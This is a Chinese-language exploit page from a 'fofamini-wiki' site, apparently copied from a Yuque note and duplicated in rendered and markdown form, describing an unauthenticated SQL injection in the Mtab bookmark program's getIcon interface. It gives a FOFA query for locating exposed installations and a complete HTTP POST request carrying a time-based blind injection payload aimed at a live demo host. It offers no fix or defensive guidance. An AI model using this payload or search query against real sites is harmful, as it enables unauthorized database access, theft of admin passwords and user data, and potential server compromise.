fofamini-wiki

登录白背景

源码

Mtab书签导航程序getIcon存在SQL注入漏洞

一、漏洞简介

Mtab书签导航程序 getIcon接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限,

二、影响版本

Mtab书签导航程序

三、资产测绘

fofatitle="Mtab书签"
特征

四、漏洞复现

POST /LinkStore/getIcon HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Accept: application/json, text/plain, */*
Content-Length: 50
Accept-Encoding: gzip,deflate,br
Accept-Ldwk: bG91ZG9uZ3dlbmt1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: demo.mtab.cc
Connection: Keep-alive

{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}

原文: https://www.yuque.com/xiaokp7/ocvun2/zh1kkxkx954xmoav

# Mtab书签导航程序getIcon存在SQL注入漏洞

# 一、漏洞简介
Mtab书签导航程序 getIcon接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限,

# 二、影响版本
+ Mtab书签导航程序

# 三、资产测绘
+ fofa`title="Mtab书签"`
+ 特征

![1723137376325-46b93278-2a6b-4282-9d43-f62a52d4a5c3.png](./img/ikJp54DnoI9jw2_u/1723137376325-46b93278-2a6b-4282-9d43-f62a52d4a5c3-130802.png)

# 四、漏洞复现
```plain
POST /LinkStore/getIcon HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Accept: application/json, text/plain, */*
Content-Length: 50
Accept-Encoding: gzip,deflate,br
Accept-Ldwk: bG91ZG9uZ3dlbmt1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: demo.mtab.cc
Connection: Keep-alive

{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}
```

![1723137446678-952fad28-ed4a-478d-afc9-3495b1cd27b2.png](./img/ikJp54DnoI9jw2_u/1723137446678-952fad28-ed4a-478d-afc9-3495b1cd27b2-711641.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zh1kkxkx954xmoav>